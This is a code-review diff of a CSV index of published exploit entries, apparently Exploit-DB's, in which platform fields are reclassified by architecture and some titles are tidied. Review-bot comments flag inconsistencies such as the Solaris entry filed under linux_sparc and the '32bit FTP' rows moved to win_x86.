36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
|
||||
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0
|
||||
37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
|
||||
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
|
||||
36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0
|
||||
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
|
||||
36887,platforms/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,linux,local,0
|
||||
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",windows,local,0
|
||||
|
@ -8428,8 +8428,8 @@ id,file,description,date,author,platform,type,port
|
|||
37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0
|
||||
37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
|
||||
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
|
||||
37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
|
||||
37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0
|
||||
37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - (Nested NMIs Interrupting) Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0
|
||||
37724,platforms/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",lin_x86,local,0
|
||||
37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",windows,local,0
|
||||
37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0
|
||||
38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0
|
||||
|
@ -8519,7 +8519,7 @@ id,file,description,date,author,platform,type,port
|
|||
38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0
|
||||
38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
|
||||
38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
|
||||
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0
|
||||
38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Privilege Escalation",2015-12-01,rebel,linux,local,0
|
||||
38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
|
||||
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
|
||||
38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0
|
||||
|
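Review bot: Row 38832 now quotes the component as 'abrt/sosreport', but the next row, 38835 "Centos 7.1 / Fedora 22 - abrt Privilege Escalation", still has abrt unquoted. Quote it there as well so that the two abrt rows follow the same title convention.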
@ -8549,7 +8549,7 @@ id,file,description,date,author,platform,type,port
|
|||
40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
|
||||
39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
|
||||
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
|
||||
40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
|
||||
40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
|
||||
39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
|
||||
|
@ -8597,7 +8597,7 @@ id,file,description,date,author,platform,type,port
|
|||
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
|
||||
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
|
||||
39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
|
||||
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
|
||||
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
|
||||
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
|
||||
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
|
||||
|
@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port
|
|||
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
|
||||
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
|
||||
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
|
||||
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
|
||||
39984,platforms/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local,0
|
||||
39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
|
||||
40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
|
||||
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
|
||||
|
@ -8630,7 +8630,7 @@ id,file,description,date,author,platform,type,port
|
|||
40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0
|
||||
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0
|
||||
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
|
||||
40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0
|
||||
40049,platforms/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,lin_x86-64,local,0
|
||||
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
|
||||
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
|
||||
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
|
||||
|
@ -8647,7 +8647,7 @@ id,file,description,date,author,platform,type,port
|
|||
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
|
||||
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
|
||||
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
|
||||
|
@ -8731,7 +8731,7 @@ id,file,description,date,author,platform,type,port
|
|||
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
|
||||
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
|
||||
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
|
||||
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
|
||||
40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
|
||||
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
|
||||
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
|
||||
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
|
||||
|
@ -8742,7 +8742,7 @@ id,file,description,date,author,platform,type,port
|
|||
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
|
||||
40871,platforms/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,lin_x86-64,local,0
|
||||
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
|
||||
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
|
||||
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
|
||||
|
@ -8759,7 +8759,7 @@ id,file,description,date,author,platform,type,port
|
|||
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
|
||||
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
|
||||
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
|
||||
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
|
||||
41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
||||
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
|
||||
|
@ -8774,6 +8774,7 @@ id,file,description,date,author,platform,type,port
|
|||
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
|
||||
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
|
||||
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
|
||||
41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -8902,7 +8903,7 @@ id,file,description,date,author,platform,type,port
|
|||
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
|
||||
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
|
||||
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
|
||||
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
|
||||
269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
|
||||
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
|
||||
277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
|
||||
279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
|
||||
|
@ -8927,7 +8928,7 @@ id,file,description,date,author,platform,type,port
|
|||
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
|
||||
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
|
||||
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
|
||||
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
|
||||
346,platforms/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux_sparc,remote,23
|
||||
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
|
||||
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
|
||||
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
|
||||
|
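Review bot: Row 346 moves from platforms/linux/ to platforms/linux_sparc/, yet its title reads "Solaris /bin/login (SPARC/x86)". The target OS is Solaris and the title covers x86 as well as SPARC, so the new platform value matches neither. Other rows in this file already use a solaris platform (for example 263 under platforms/solaris/remote/), and filing 346 there would keep OS-based filtering accurate.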
@ -9165,7 +9166,7 @@ id,file,description,date,author,platform,type,port
|
|||
1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0
|
||||
1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0
|
||||
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0
|
||||
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
|
||||
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
|
||||
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
|
||||
|
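Review bot: The row for 1291 moves gpsdrive 2.09 (x86) to `lin_x86`, but its sibling 1290, the PPC variant of the same friendsd2 format string issue, stays under `linux` two rows up, so a platform filter now splits the pair. Either give 1290 a matching architecture-specific platform or leave both under `linux`. The new value is also abbreviated as `lin_x86` while the earlier change to 346 spells out `linux_sparc`; pick one prefix style and document it next to the CSV header.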
@ -9303,7 +9304,7 @@ id,file,description,date,author,platform,type,port
|
|||
2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0
|
||||
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
|
||||
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
|
||||
2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80
|
||||
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
|
||||
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
|
||||
|
@ -9419,7 +9420,7 @@ id,file,description,date,author,platform,type,port
|
|||
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
|
||||
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
|
||||
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
|
||||
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
|
||||
3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53
|
||||
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
|
||||
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
|
||||
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
|
||||
|
@ -9972,10 +9973,10 @@ id,file,description,date,author,platform,type,port
|
|||
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0
|
||||
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0
|
||||
8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0
|
||||
8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
|
||||
8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
|
||||
8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0
|
||||
8623,platforms/windows/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0
|
||||
8613,platforms/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
|
||||
8614,platforms/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
|
||||
8621,platforms/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,win_x86,remote,0
|
||||
8623,platforms/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,win_x86,remote,0
|
||||
8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0
|
||||
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
|
||||
8696,platforms/hardware/remote/8696.txt,"Multiple D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0
|
||||
|
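Review bot: Rows 8613, 8614, 8621 and 8623 are moved to `win_x86`, yet none of their titles carries an architecture tag such as "(Windows x86)"; the only "32bit" in them is the product name "32bit FTP". This looks like a pattern match on the product name rather than a statement about the target architecture. If the entries really are x86-only, add the tag to the titles as was done for 2680; otherwise leave them under `windows`.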
@ -10841,7 +10842,7 @@ id,file,description,date,author,platform,type,port
|
|||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
|
||||
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
|
||||
16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
|
||||
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
|
||||
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
|
@ -10865,12 +10866,12 @@ id,file,description,date,author,platform,type,port
|
|||
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16738,platforms/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
|
||||
16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
|
||||
16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21
|
||||
